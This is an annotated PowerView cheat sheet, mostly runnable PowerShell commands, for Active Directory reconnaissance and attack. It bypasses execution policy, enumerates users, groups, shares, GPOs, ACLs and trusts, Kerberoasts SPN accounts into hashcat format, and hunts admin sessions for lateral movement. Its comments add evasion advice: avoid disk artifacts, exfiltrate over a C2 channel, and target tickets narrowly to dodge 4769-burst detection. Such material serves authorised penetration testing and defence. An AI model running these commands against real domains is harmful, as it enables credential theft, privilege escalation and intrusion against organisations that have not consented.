powerview.ps1
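# Start a PowerShell session that does not enforce the execution policy, then
# load PowerView into it. The original single line ran both commands with ";",
# which starts a nested interactive shell and only imports the module after
# that nested shell exits -- they are two separate steps.
# Execution policy is not a security boundary, but "-ExecutionPolicy Bypass"
# on the command line is a common process-creation detection signature, and
# the script contents will still be seen by AMSI / Script Block Logging when
# loaded.
powershell.exe -ExecutionPolicy Bypass
Import-Module .\PowerView.ps1
# Alternatively, dot-source the script into the current session:
. .\PowerView.ps1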
Domain information
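# Basic domain facts: the domain object, its DCs and SID. "-Domain" lets you
# query a trusted/foreign domain instead of the current one.
Get-Domain [-Domain DOMAIN]
Get-DomainController [-Domain DOMAIN]
Get-DomainSID
# Default Domain Policy, parsed from GptTmpl.inf. Read this BEFORE any password
# spraying: it holds the lockout threshold/window and password length rules.
Get-DomainPolicy
(Get-DomainPolicy)."SystemAccess"      # lockout threshold, min password length, history
(Get-DomainPolicy)."KerberosPolicy"    # ticket lifetimes, max clock skew
# NOTE: the key names differ between PowerView branches; older builds expose
# them as ."system access" / ."kerberos policy" (with the space).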
Domain Users & Computers
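# Dump all user objects. Writing to disk leaves an artifact on the host --
# pipe to the console or exfil over your C2 channel instead when possible.
Get-DomainUser | Out-File -FilePath .\DomainUsers.txt
Get-DomainUser | select samaccountname,userprincipalname, memberof
# The "description" attribute is worth reading by hand: it is a frequent home
# for plaintext passwords and service notes. "admincount=1" marks (current or
# former) members of protected groups; "serviceprincipalname" flags
# Kerberoast candidates; "useraccountcontrol" reveals DONT_REQ_PREAUTH
# (AS-REP roast), password-never-expires and disabled accounts.
Get-DomainUser * -Domain DOMAIN | Select-Object -Property name,samaccountname,description,memberof,admincount,userprincipalname, serviceprincipalname, useraccountcontrol
# Get-UserProperty is the legacy helper; the dev branch equivalent is
# Get-DomainUser -Properties FIELD.
Get-UserProperty [-Properties FIELD]
# Computer objects with OS version -- useful for spotting unsupported/legacy
# hosts. This is pure LDAP and generates no traffic to the hosts themselves.
Get-DomainComputer -Properties OperatingSystem, Name, DnsHostName | Sort-Object -Property DnsHostName
# live hosts -- "-Ping" sends an ICMP probe to every computer object, which
# is noisier than the LDAP-only query above.
Get-DomainComputer -Ping -Properties OperatingSystem, Name, DnsHostName | Sort-Object -Property DnsHostName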
Kerberoastable Users
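# List user accounts that have an SPN (Get-NetUser is the legacy alias of
# Get-DomainUser). This step is LDAP-only and does not request any tickets.
Get-NetUser -SPN | select serviceprincipalname
# Request a service ticket for every SPN user and emit it in hashcat format.
# Each request produces a 4769 event on the DC; a burst of them (especially
# with RC4 encryption) is a well-known Kerberoasting detection, so prefer
# targeting specific accounts rather than "*" once you know who matters.
Get-DomainUser * -SPN | Get-DomainSPNTicket -OutputFormat Hashcat
# Invoke-Kerberoast -OutputFormat Hashcat wraps the same two steps and skips
# the krbtgt account.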
Domain Groups
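# Enumerate groups and their members. Wildcards work on the name, e.g.
# *admin* to catch "Domain Admins", "Exchange Admins", custom admin groups.
# Get-NetGroup / Get-NetGroupMember are the legacy aliases; the dev branch
# names are Get-DomainGroup / Get-DomainGroupMember and take -Identity.
Get-NetGroup [-GroupName "GROUPNAME"]
Get-NetGroupMember [-GroupName "GROUPNAME"]
# Nested membership is easy to miss: use -Recurse to expand groups inside
# groups, e.g. Get-DomainGroupMember -Identity "Domain Admins" -Recurse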
SMB Shares
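# Enumerate SMB shares on every domain computer. This connects to each host
# over SMB (noisy, and slow on large domains); -CheckShareAccess additionally
# tries to open each share to report only the ones readable as the current
# user. Invoke-ShareFinder is the legacy name; the dev branch is
# Find-DomainShare.
Invoke-ShareFinder [-CheckShareAccess]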
GPO
# All Group Policy Objects in the domain (Get-NetGPO is the legacy alias of
# Get-DomainGPO); pipe through select to keep only the display names.
Get-NetGPO [| select displayname]
# GPOs that push users/groups into local groups via Restricted Groups or
# Group Policy Preferences -- the usual way local admin rights are granted
# domain-wide.
Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName
ACLs
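# Returns the ACEs on the specified object. -ResolveGUIDs turns extended-right
# GUIDs into names (e.g. the replication rights that enable DCSync). Note the
# cmdlet name is Get-DomainObjectAcl (the original had a typo).
Get-DomainObjectAcl -Identity <AccountName> -ResolveGUIDs
# Search for interesting ACEs: modification rights (GenericAll, WriteDacl,
# WriteOwner, ...) held by non-built-in principals, i.e. ACL-based
# privilege-escalation paths.
Find-InterestingDomainAcl -ResolveGUIDs
# Check the ACLs associated with a specified path (e.g. an SMB share)
Get-PathAcl -Path "\\Path\Of\A\Share"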
Domain Trusts
# Trusts of the current domain, or of the named one.
Get-DomainTrust
Get-DomainTrust -Domain <DomainName>
# Walk the trust graph: enumerate the current domain's trusts, then the
# trusts of every domain found, until no new domains turn up.
Get-DomainTrustMapping
User Hunting
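# Finds all machines in the current domain where the current user has local
# admin access. This touches every host (remote service-manager open), so it
# is loud on networks with host-based telemetry.
Find-LocalAdminAccess -Verbose
# Find local admins on all machines of the domain (queries each host's local
# group membership -- same noise caveat).
Find-DomainLocalGroupMember -Verbose
# Find computers where a Domain Admin (default) OR a specified user has a
# session; the classic "where do I go next" query for lateral movement.
Find-DomainUserLocation | Select-Object UserName, SessionFromName
# Confirming admin access on one host (defaults to the local machine; pass
# -ComputerName to check a remote one).
Test-AdminAccess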
References